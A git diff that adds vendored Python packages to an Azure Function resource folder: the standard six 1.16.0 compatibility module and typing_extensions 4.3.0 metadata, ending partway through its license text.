b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/top_level.txt @@ -0,0 +1 @@ +six diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six.py new file mode 100644 index 0000000..a02bc8c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six.py @@ -0,0 +1,998 @@ +# Copyright (c) 2010-2020 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Utilities for writing code that runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.16.0" + + +# Useful for very coarse version differentiation. +PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = str, + integer_types = int, + class_types = type, + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = basestring, + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). + class X(object): + + def __len__(self): + return 1 << 31 + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." + fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." + fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + MovedModule("html_parser", "HTMLParser", "html.parser"), + MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", + "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", + "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", + "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." + attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", "moves.urllib.parse") + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", "moves.urllib.error") + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", "moves.urllib.request") + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", "moves.urllib.response") + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in _urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes + +_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), + "moves.urllib_robotparser", "moves.urllib.robotparser") + + +class Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ['parse', 'error', 'request', 'response', 'robotparser'] + +_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"), + "moves.urllib") + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + def advance_iterator(it): + return it.next() +next = advance_iterator + + +try: + callable = callable +except NameError: + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc(get_unbound_function, + """Get the function out of a possibly unbound function""") + + +get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, "Return an iterator over the values of a dictionary.") +_add_doc(iteritems, + "Return an iterator over the (key, value) pairs of a dictionary.") +_add_doc(iterlists, + "Return an iterator over the (key, [values]) pairs of a dictionary.") + + +if PY3: + def b(s): + return s.encode("latin-1") + + def u(s): + return s + unichr = chr + import struct + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + def b(s): + return s + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + +else: + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec("""exec _code_ in _globs_, _locs_""") + + exec_("""def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""") + + +if sys.version_info[:2] > (3,): + exec_("""def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""") +else: + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. + if (isinstance(fp, file) and + isinstance(data, unicode) and + fp.encoding is not None): + errors = getattr(fp, "errors", None) + if errors is None: + errors = "strict" + data = data.encode(fp.encoding, errors) + fp.write(data) + want_unicode = False + sep = kwargs.pop("sep", None) + if sep is not None: + if isinstance(sep, unicode): + want_unicode = True + elif not isinstance(sep, str): + raise TypeError("sep must be None or a string") + end = kwargs.pop("end", None) + if end is not None: + if isinstance(end, unicode): + want_unicode = True + elif not isinstance(end, str): + raise TypeError("end must be None or a string") + if kwargs: + raise TypeError("invalid keyword arguments to print()") + if not want_unicode: + for arg in args: + if isinstance(arg, unicode): + want_unicode = True + break + if want_unicode: + newline = unicode("\n") + space = unicode(" ") + else: + newline = "\n" + space = " " + if sep is None: + sep = space + if end is None: + end = newline + for i, arg in enumerate(args): + if i: + write(sep) + write(arg) + write(end) +if sys.version_info[:2] < (3, 3): + _print = print_ + + def print_(*args, **kwargs): + fp = kwargs.get("file", sys.stdout) + flush = kwargs.pop("flush", False) + _print(*args, **kwargs) + if flush and fp is not None: + fp.flush() + +_add_doc(reraise, """Reraise an exception.""") + +if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper(wrapper, wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + + def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + return functools.partial(_update_wrapper, wrapped=wrapped, + assigned=assigned, updated=updated) + wraps.__doc__ = functools.wraps.__doc__ + +else: + wraps = functools.wraps + + +def with_metaclass(meta, *bases): + """Create a base class with a metaclass.""" + # This requires a bit of explanation: the basic idea is to make a dummy + # metaclass for one level of class instantiation that replaces itself with + # the actual metaclass. + class metaclass(type): + + def __new__(cls, name, this_bases, d): + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). + resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d['__orig_bases__'] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + return type.__new__(metaclass, 'temporary_class', (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get('__slots__') + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop('__dict__', None) + orig_vars.pop('__weakref__', None) + if hasattr(cls, '__qualname__'): + orig_vars['__qualname__'] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + return wrapper + + +def ensure_binary(s, encoding='utf-8', errors='strict'): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding='utf-8', errors='strict'): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding='utf-8', errors='strict'): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if '__str__' not in klass.__dict__: + raise ValueError("@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % + klass.__name__) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode('utf-8') + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) +if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if (type(importer).__name__ == "_SixMetaPathImporter" and + importer.name == __name__): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/LICENSE new file mode 100644 index 0000000..d41be44 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/LICENSE @@ -0,0 +1,254 @@ +A. HISTORY OF THE SOFTWARE +========================== + +Python was created in the early 1990s by Guido van Rossum at Stichting +Mathematisch Centrum (CWI, see http://www.cwi.nl) in the Netherlands +as a successor of a language called ABC. Guido remains Python's +principal author, although it includes many contributions from others. + +In 1995, Guido continued his work on Python at the Corporation for +National Research Initiatives (CNRI, see http://www.cnri.reston.va.us) +in Reston, Virginia where he released several versions of the +software. + +In May 2000, Guido and the Python core development team moved to +BeOpen.com to form the BeOpen PythonLabs team. In October of the same +year, the PythonLabs team moved to Digital Creations (now Zope +Corporation, see http://www.zope.com). In 2001, the Python Software +Foundation (PSF, see http://www.python.org/psf/) was formed, a +non-profit organization created specifically to own Python-related +Intellectual Property. Zope Corporation is a sponsoring member of +the PSF. + +All Python releases are Open Source (see http://www.opensource.org for +the Open Source Definition). Historically, most, but not all, Python +releases have also been GPL-compatible; the table below summarizes +the various releases. + + Release Derived Year Owner GPL- + from 